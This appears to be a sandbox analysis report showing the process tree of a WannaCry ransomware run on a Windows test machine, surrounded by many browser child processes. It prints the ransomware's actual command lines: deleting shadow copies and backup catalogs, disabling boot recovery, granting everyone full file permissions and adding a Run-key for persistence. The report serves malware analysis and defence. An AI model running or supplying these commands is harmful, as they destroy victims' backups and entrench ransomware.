  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1768,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1760 /prefetch:2
  2⤵
  PID:4700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1936,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2100 /prefetch:3
  2⤵
  PID:2264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2168 /prefetch:8
  2⤵
  PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3116 /prefetch:1
  2⤵
  PID:4616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3080,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:3904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4368,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4380 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4708,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4716 /prefetch:8
  2⤵
  PID:1108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:2012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5052,i,16650807309466399354,8959389270540104625,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:896

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb00c83cb8,0x7ffb00c83cc8,0x7ffb00c83cd8
  2⤵
  PID:2272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1952 /prefetch:2
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
  2⤵
  PID:3592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:2228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
  2⤵
  PID:4896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
  2⤵
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3480 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:4956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
  2⤵
  PID:1608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:2148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5000 /prefetch:8
  2⤵
  PID:2096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
  2⤵
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:2620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6280 /prefetch:8
  2⤵
  PID:1092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:1
  2⤵
  PID:1828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
  2⤵
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:4780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
  2⤵
  PID:236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6412 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4560 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3824
- C:\Users\Admin\Downloads\WannaCry.EXE
  "C:\Users\Admin\Downloads\WannaCry.EXE"
  2⤵
  - Drops startup file
  - Sets desktop wallpaper using registry
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2892
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:5000
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:4696
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 226131723537123.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4496
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:2580
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2952
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] co
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5404
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5616
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5416
  - - C:\Users\Admin\Downloads\@[email protected]
      @[email protected] vs
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:5464
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5780
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5828
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6084
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6104
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6112
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "olcfvlzcexhkc292" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6120
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "olcfvlzcexhkc292" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4104
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4864
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:552
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4416
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5280
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5316
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5340
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5116
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6120
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6128
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2328
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2772
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1790834210346984944,8747730818529412536,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:5556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:672

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2148

C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
1⤵
- Sets desktop wallpaper using registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://en.wikipedia.org/wiki/Bitcoin
  2⤵
  PID:2188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb00c83cb8,0x7ffb00c83cc8,0x7ffb00c83cd8
    3⤵
    PID:3804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+buy+bitcoin
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage
  PID:228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb00c83cb8,0x7ffb00c83cc8,0x7ffb00c83cd8
    3⤵
    PID:4500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,14734953690095411957,17323969461906437761,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
    3⤵
    PID:3824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,14734953690095411957,17323969461906437761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3212
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,14734953690095411957,17323969461906437761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
    3⤵
    PID:5156
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,14734953690095411957,17323969461906437761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
    3⤵
    PID:5884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,14734953690095411957,17323969461906437761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
    3⤵
    PID:4844
